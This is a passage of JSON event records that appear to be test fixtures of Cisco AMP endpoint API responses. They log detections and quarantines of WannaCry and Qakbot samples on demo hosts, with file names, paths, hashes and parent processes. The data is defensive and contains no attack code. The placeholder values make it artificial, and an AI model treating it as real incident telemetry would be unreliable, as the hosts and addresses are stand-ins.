Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847670","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":776000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":745000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":730000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847667","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":620000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":355000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":308000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2372,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":293000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":277000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":230000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":184000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2372,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":152000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 